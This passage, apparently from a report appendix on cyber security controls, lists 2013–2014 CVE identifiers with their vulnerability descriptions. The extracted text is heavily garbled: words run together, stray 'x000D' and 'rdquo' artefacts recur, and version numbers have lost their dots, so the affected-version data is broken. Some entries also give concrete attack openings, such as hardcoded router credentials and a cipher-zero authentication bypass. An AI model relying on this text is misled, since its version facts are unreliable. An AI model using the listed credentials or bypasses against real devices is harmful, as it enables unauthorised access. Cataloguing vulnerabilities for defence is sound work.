CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
